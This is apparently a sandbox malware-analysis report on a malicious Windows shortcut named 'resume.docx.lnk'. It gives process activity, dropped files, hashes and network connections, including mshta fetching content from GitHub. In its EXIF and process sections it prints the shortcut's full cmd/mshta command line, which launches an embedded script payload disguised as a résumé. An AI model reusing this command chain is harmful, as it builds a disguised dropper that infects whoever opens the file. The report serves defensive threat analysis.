File name: resume.docx.lnk

Full analysis: https://app.any.run/tasks/eaf4d3ea-6afb-4ac5-9a9f-48c8f284b7aa
Verdict: Malicious activity
Analysis date: December 06, 2024, 11:13:42
OS: Windows 10 Professional (build: 19045, 64 bit)
Tags: github
Indicators:
MIME: application/x-ms-shortcut
File info: MS Windows shortcut, Item id list present, Points to a file or directory, Has command line arguments, Icon number=1, Unicoded, HasEnvironment "%windir%\system32\cmd.exe", MachineID uran, EnableTargetMetadata KnownFolderID 1AC14E77-02E7-4E5D-B744-2EB1AE5198B7, Archive, ctime=Thu Jun 13 12:22:21 2024, atime=Fri Nov 29 19:01:05 2024, mtime=Thu Jun 13 12:22:21 2024, length=289792, window=normal, IDListSize 0x0135, Root folder "20D04FE0-3AEA-1069-A2D8-08002B30309D", Volume "C:\", LocalBasePath "C:\Windows\System32\cmd.exe"
MD5: 6076EAF95EF25DBC49552FFABB7AF05F
SHA1: 159826D32AE3713C836175FAFC22C30F30C1CE29
SHA256: 6F3194EACF6A888B7CF60AB43F5BAB1027C0803609183AA13AB3DDD130FD3ECC
SSDEEP: 384:7w1lqQdSh7G+d6obKaYVeTZ4VtNz84JUyIlKGa02HkdCzmIMYK3VhD:SqJEobKXukPz8eUykKGazDMT33

  • MALICIOUS

    • Sends HTTP request (SCRIPT)

      • mshta.exe (PID: 5780)
    • Opens an HTTP connection (SCRIPT)

      • mshta.exe (PID: 5780)
    • Creates internet connection object (SCRIPT)

      • mshta.exe (PID: 5780)
    • Accesses environment variables (SCRIPT)

      • cscript.exe (PID: 6576)
    • Gets TEMP folder path (SCRIPT)

      • cscript.exe (PID: 6576)
    • Deletes a file (SCRIPT)

      • mshta.exe (PID: 5780)
  • SUSPICIOUS

    • Creates a Stream, which may work with files, input/output devices, pipes, or TCP/IP sockets (SCRIPT)

      • mshta.exe (PID: 5780)
    • Writes binary data to a Stream object (SCRIPT)

      • mshta.exe (PID: 5780)
    • Creates FileSystem object to access computer's file system (SCRIPT)

      • mshta.exe (PID: 5780)
      • cscript.exe (PID: 6576)
    • The process executes VB scripts

      • Word.exe (PID: 6548)
    • Saves data to a binary file (SCRIPT)

      • mshta.exe (PID: 5780)
    • Executable content was dropped or overwritten

      • mshta.exe (PID: 5780)
      • Word.exe (PID: 6548)
    • Checks whether a specific file exists (SCRIPT)

      • cscript.exe (PID: 6576)
    • Executing commands from a ".bat" file

      • cscript.exe (PID: 6576)
    • Starts CMD.EXE for commands execution

      • mshta.exe (PID: 5780)
      • cscript.exe (PID: 6576)
    • Runs PING.EXE to delay simulation

      • cmd.exe (PID: 4164)
    • Runs shell command (SCRIPT)

      • cscript.exe (PID: 6576)
      • mshta.exe (PID: 5780)
    • Uses TIMEOUT.EXE to delay execution

      • cmd.exe (PID: 6716)
    • Starts application with an unusual extension

      • Word.exe (PID: 6548)
    • Reads data from a file (SCRIPT)

      • mshta.exe (PID: 5780)
    • Hides command output

      • cmd.exe (PID: 4164)
    • Detected use of alternative data streams (AltDS)

      • Word.exe (PID: 6548)
  • INFO

    • Reads Internet Explorer settings

      • mshta.exe (PID: 5780)
    • Checks supported languages

      • Word.exe (PID: 6548)
      • base.pk (PID: 5992)
    • Checks proxy server information

      • mshta.exe (PID: 5780)
    • Create files in a temporary directory

      • Word.exe (PID: 6548)
    • Reads security settings of Internet Explorer

      • cscript.exe (PID: 6576)
    • The process uses the downloaded file

      • cscript.exe (PID: 6576)
      • WINWORD.EXE (PID: 5308)
      • mshta.exe (PID: 5780)
    • Drops encrypted VBS script (Microsoft Script Encoder)

      • WINWORD.EXE (PID: 5308)
    • Sends debugging messages

      • WINWORD.EXE (PID: 5308)
No Malware configuration.

TRiD

.lnk | Windows Shortcut (100)

EXIF

LNK

Flags: IDList, LinkInfo, CommandArgs, IconFile, Unicode, ExpString, TargetMetadata
FileAttributes: Archive
CreateDate: 2024:06:13 12:22:21+00:00
AccessDate: 2024:11:29 19:01:05+00:00
ModifyDate: 2024:06:13 12:22:21+00:00
TargetFileSize: 289792
IconIndex: 1
RunWindow: Normal
HotKey: (none)
TargetFileDOSName: cmd.exe
DriveType: Fixed Disk
DriveSerialNumber: 1ABE-90A2
VolumeLabel: Windows 10
LocalBasePath: C:\Windows\System32\cmd.exe
CommandLineArguments: /C "if exist %CD%\resume.docx.lnk (start "" /B "mshta" "%CD%\resume.docx.lnk" & exit 0) else for /f "delims=" %a in ('dir /b /o-d %TEMP%\*.rartemp') do start "" /B "mshta" "%TEMP%\%a\resume.docx.lnk" & exit 0"
IconFileName: %SystemRoot%\System32\SHELL32.dll
MachineID: uran
No data.
Total processes: 151
Monitored processes: 20
Malicious processes: 4
Suspicious processes: 0

Behavior graph

start, cmd.exe (no specs), conhost.exe (no specs), mshta.exe, word.exe (no specs), word.exe, cscript.exe (no specs), conhost.exe (no specs), cmd.exe (no specs), conhost.exe (no specs), timeout.exe (no specs), secedit.exe (no specs), timeout.exe (no specs), try5ed0.tmp (no specs), base.pk (no specs), conhost.exe (no specs), cmd.exe (no specs), conhost.exe (no specs), ping.exe (no specs), winword.exe, ai.exe (no specs)

Process information

PID | CMD | Path | Indicators | Parent process

PID: 2136
CMD: \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1
Path: C:\Windows\System32\conhost.exe
Parent process: base.pk
User: admin
Company: Microsoft Corporation
Integrity Level: HIGH
Description: Console Window Host
Exit code: 0
Version: 10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll

PID: 2220
CMD: \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1
Path: C:\Windows\System32\conhost.exe
Parent process: cmd.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Console Window Host
Exit code: 0
Version: 10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll

PID: 2452
CMD: ping -n 3 127.0.0.1
Path: C:\Windows\System32\PING.EXE
Parent process: cmd.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: TCP/IP Ping Command
Exit code: 0
Version: 10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\ping.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\nsi.dll

PID: 2744
CMD: \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1
Path: C:\Windows\System32\conhost.exe
Parent process: cmd.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Console Window Host
Exit code: 0
Version: 10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll

PID: 4164
CMD: "C:\Windows\System32\cmd.exe" /c ping -n 3 127.0.0.1>nul
Path: C:\Windows\System32\cmd.exe
Parent process: mshta.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Windows Command Processor
Exit code: 0
Version: 10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\sechost.dll
c:\windows\system32\bcrypt.dll

PID: 5308
CMD: "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /Automation -Embedding
Path: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
Parent process: svchost.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Microsoft Word
Version: 16.0.16026.20146
Modules
Images
c:\program files\microsoft office\root\office16\winword.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\program files\common files\microsoft shared\clicktorun\appvisvsubsystems64.dll

PID: 5464
CMD: "C:\Windows\System32\cmd.exe" /C "if exist %CD%\resume.docx.lnk (start "" /B "mshta" "%CD%\resume.docx.lnk" & exit 0) else for /f "delims=" %a in ('dir /b /o-d C:\Users\admin\AppData\Local\Temp\*.rartemp') do start "" /B "mshta" "C:\Users\admin\AppData\Local\Temp\%a\resume.docx.lnk" & exit 0"
Path: C:\Windows\System32\cmd.exe
Parent process: explorer.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Windows Command Processor
Exit code: 0
Version: 10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\sechost.dll
c:\windows\system32\bcrypt.dll

PID: 5780
CMD: "mshta" "C:\Users\admin\AppData\Local\Temp\resume.docx.lnk"
Path: C:\Windows\System32\mshta.exe
Parent process: cmd.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Microsoft (R) HTML Application host
Exit code: 0
Version: 11.00.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\mshta.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\wldp.dll

PID: 5992
CMD: base.pk
Path: C:\Users\admin\AppData\Local\Temp\base.pk
Parent process: Word.exe
User: admin
Integrity Level: HIGH
Exit code: 1
Modules
Images
c:\users\admin\appdata\local\temp\base.pk
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\msvcrt.dll

PID: 6372
CMD: "C:\Users\admin\AppData\Local\Temp\Word.exe"
Path: C:\Users\admin\AppData\Local\Temp\Word.exe
Parent process: mshta.exe
User: admin
Integrity Level: MEDIUM
Exit code: 3221226540
Modules
Images
c:\users\admin\appdata\local\temp\word.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll

Total events: 16 310
Read events: 15 921
Write events: 361
Delete events: 28

Modification events

Process: mshta.exe (PID 5780)
Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content
Operation: write
Name: CachePrefix
Value:

Process: mshta.exe (PID 5780)
Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies
Operation: write
Name: CachePrefix
Value: Cookie:

Process: mshta.exe (PID 5780)
Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History
Operation: write
Name: CachePrefix
Value: Visited:

Process: WINWORD.EXE (PID 5308)
Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
Operation: write
Name: de-de
Value: 1

Process: WINWORD.EXE (PID 5308)
Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
Operation: write
Name: es-es
Value: 1

Process: WINWORD.EXE (PID 5308)
Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
Operation: write
Name: fr-fr
Value: 1

Process: WINWORD.EXE (PID 5308)
Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
Operation: write
Name: it-it
Value: 1

Process: WINWORD.EXE (PID 5308)
Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
Operation: write
Name: ja-jp
Value: 1

Process: WINWORD.EXE (PID 5308)
Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
Operation: write
Name: ko-kr
Value: 1

Process: WINWORD.EXE (PID 5308)
Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
Operation: write
Name: pt-br
Value: 1

Executable files: 9
Suspicious files: 121
Text files: 50
Unknown types: 4

Dropped files

PID | Process | Filename | Type
5780 | mshta.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\INetCache\IE\RR3E01RZ\resume[1].doc | executable
MD5:10233969EF917B123B0249EF8FE64536
SHA256:B0CDF21D7F402C86A7F87BEAA896AD967B3453D2A28215C31BA655445A40ABB8
5308 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\TokenBroker\Cache\089d66ba04a8cec4bdc5267f42f39cf84278bb67.tbres | binary
MD5:C58660CE5AE55CBBDF61E8922E975276
SHA256:D78C71C2A2B63413623CE72FCE25897AE95D6E68E05051578FF338C0EBBDA162
6548 | Word.exe | C:\Users\admin\AppData\Local\Temp\gpmsc_externalDBMSleanup.bat | text
MD5:C5148520A262094D3CF9155A4F6C6B51
SHA256:AE674F232BF01C2FC7D1FDD88BDF3136261BB8B9733D7D2047981909A6913F9F
6548 | Word.exe | C:\Users\admin\AppData\Local\Temp\58C2.tmp | executable
MD5:3964CB1289BD1D131EF2E000617D45A2
SHA256:0449B5AB5219D807C35634FE263DDE16C6AEA73633378A08553CBF09E977244A
5780 | mshta.exe | C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_49536AB5156BDD74EFF881D01C36A419 | binary
MD5:513D3B1339DA0BF0F3C0DE494972A037
SHA256:60DD835F92BB14F2F281EC94AFAA84454C16FCEB1B002FAE2AB17672AC8881F3
6548 | Word.exe | C:\Users\admin\AppData\Local\Temp\fne5ECF.tmp | binary
MD5:C41358C0844D2BCA1CBA7C782BDB02A2
SHA256:DCCE213AB6543D8C283D77B4A526F6FF9A065F97BBB9F2007A4319034F78A1CC
5780 | mshta.exe | C:\Users\admin\AppData\Local\Temp\base.pk | executable
MD5:EC2B6BBFA9407C34E0D4B6B34AE1201C
SHA256:C76EA6A3FB5616BA106706E75B27F2CCAB62B3F6CA027DF1B5CD85A9D0448C33
6548 | Word.exe | C:\Users\admin\AppData\Local\Temp\ahh58D2.tmp.vbs | text
MD5:0A1C237316E11EC81B1DF21773710C40
SHA256:1CF290B40445860679BE3BED68C03A0E555C7A3FA91ABA8C216A34CC345A4DBE
6716 | cmd.exe | C:\Users\admin\AppData\Local\Temp\secuserpol25086.cfg | ini
MD5:5CAEE3B83983062E18D4DBAE58D9946D
SHA256:DB3DE11D4266F67ECF154F0380FA8B4020D6CDDC403F9307739BA47AE4C1C375
5780 | mshta.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\INetCache\IE\KCV3KQBA\base[1].pk | executable
MD5:EC2B6BBFA9407C34E0D4B6B34AE1201C
SHA256:C76EA6A3FB5616BA106706E75B27F2CCAB62B3F6CA027DF1B5CD85A9D0448C33
HTTP(S) requests: 19
TCP/UDP connections: 83
DNS requests: 30
Threats: 1

HTTP requests

PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation
5308 | WINWORD.EXE | GET | 200 | 192.229.221.95:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ50otx%2Fh0Ztl%2Bz8SiPI7wEWVxDlQQUTiJUIBiV5uNu5g%2F6%2BrkS7QYXjzkCEApDqVCbATUviZV57HIIulA%3D | unknown | whitelisted
5308 | WINWORD.EXE | GET | 200 | 104.124.11.17:80 | http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl | unknown | whitelisted
6212 | backgroundTaskHost.exe | GET | 200 | 192.229.221.95:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ50otx%2Fh0Ztl%2Bz8SiPI7wEWVxDlQQUTiJUIBiV5uNu5g%2F6%2BrkS7QYXjzkCEAn5bsKVVV8kdJ6vHl3O1J0%3D | unknown | whitelisted
5308 | WINWORD.EXE | GET | 200 | 104.124.11.17:80 | http://crl.microsoft.com/pki/crl/products/MicCodSigPCA_08-31-2010.crl | unknown | whitelisted
5308 | WINWORD.EXE | GET | 200 | 104.124.11.17:80 | http://crl.microsoft.com/pki/crl/products/microsoftrootcert.crl | unknown | whitelisted
5308 | WINWORD.EXE | GET | 200 | 104.124.11.17:80 | http://crl.microsoft.com/pki/crl/products/MicTimStaPCA_2010-07-01.crl | unknown | whitelisted
5308 | WINWORD.EXE | GET | 200 | 104.124.11.17:80 | http://crl.microsoft.com/pki/crl/products/MicRooCerAut_2010-06-23.crl | unknown | whitelisted
5308 | WINWORD.EXE | GET | - | 104.124.11.17:80 | http://crl.microsoft.com/pki/crl/products/MicrosoftTimeStampPCA.crl | unknown | whitelisted
4712 | MoUsoCoreWorker.exe | GET | 200 | 2.19.11.120:80 | http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl | unknown | whitelisted
5496 | svchost.exe | GET | 200 | 2.19.11.120:80 | http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl | unknown | whitelisted

Connections

PID | Process | IP | Domain | ASN | CN | Reputation
4 | System | 192.168.100.255:137 | - | - | - | whitelisted
- | - | 51.104.136.2:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted
4712 | MoUsoCoreWorker.exe | 2.19.11.120:80 | crl.microsoft.com | Elisa Oyj | NL | whitelisted
5496 | svchost.exe | 2.19.11.120:80 | crl.microsoft.com | Elisa Oyj | NL | whitelisted
4712 | MoUsoCoreWorker.exe | 104.76.201.160:80 | www.microsoft.com | AKAMAI-AS | DE | whitelisted
5496 | svchost.exe | 104.76.201.160:80 | www.microsoft.com | AKAMAI-AS | DE | whitelisted
5064 | SearchApp.exe | 2.20.142.155:443 | www.bing.com | Akamai International B.V. | DE | whitelisted
- | - | 192.229.221.95:80 | ocsp.digicert.com | EDGECAST | US | whitelisted
5780 | mshta.exe | 185.199.108.133:443 | raw.githubusercontent.com | FASTLY | US | shared
4 | System | 192.168.100.255:138 | - | - | - | whitelisted

DNS requests

Domain | IP | Reputation
settings-win.data.microsoft.com | 51.104.136.2, 20.73.194.208 | whitelisted
crl.microsoft.com | 2.19.11.120, 2.19.11.105, 104.124.11.17, 104.124.11.58 | whitelisted
www.microsoft.com | 104.76.201.160 | whitelisted
google.com | 172.217.16.142 | whitelisted
www.bing.com | 2.20.142.155, 2.20.142.187, 2.20.142.154, 92.122.215.95, 2.20.142.251, 92.122.215.57, 2.20.142.3, 92.122.215.65, 92.122.215.53 | whitelisted
ocsp.digicert.com | 192.229.221.95 | whitelisted
raw.githubusercontent.com | 185.199.108.133, 185.199.109.133, 185.199.111.133, 185.199.110.133 | shared
login.live.com | 40.126.32.76, 40.126.32.136, 40.126.32.133, 40.126.32.74, 40.126.32.140, 40.126.32.138, 20.190.160.14, 20.190.160.22 | whitelisted
go.microsoft.com | 2.19.246.123 | whitelisted
officeclient.microsoft.com | 52.109.76.240 | whitelisted

Threats

PID | Process | Class | Message
2192 | svchost.exe | Not Suspicious Traffic | INFO [ANY.RUN] Attempting to access raw user content on GitHub

Process | Message
WINWORD.EXE | WebView2: Failed to find an installed WebView2 runtime or non-stable Microsoft Edge installation.
WINWORD.EXE | WebView2: Failed to find an installed WebView2 runtime or non-stable Microsoft Edge installation.
WINWORD.EXE | WebView2: Failed to find an installed WebView2 runtime or non-stable Microsoft Edge installation.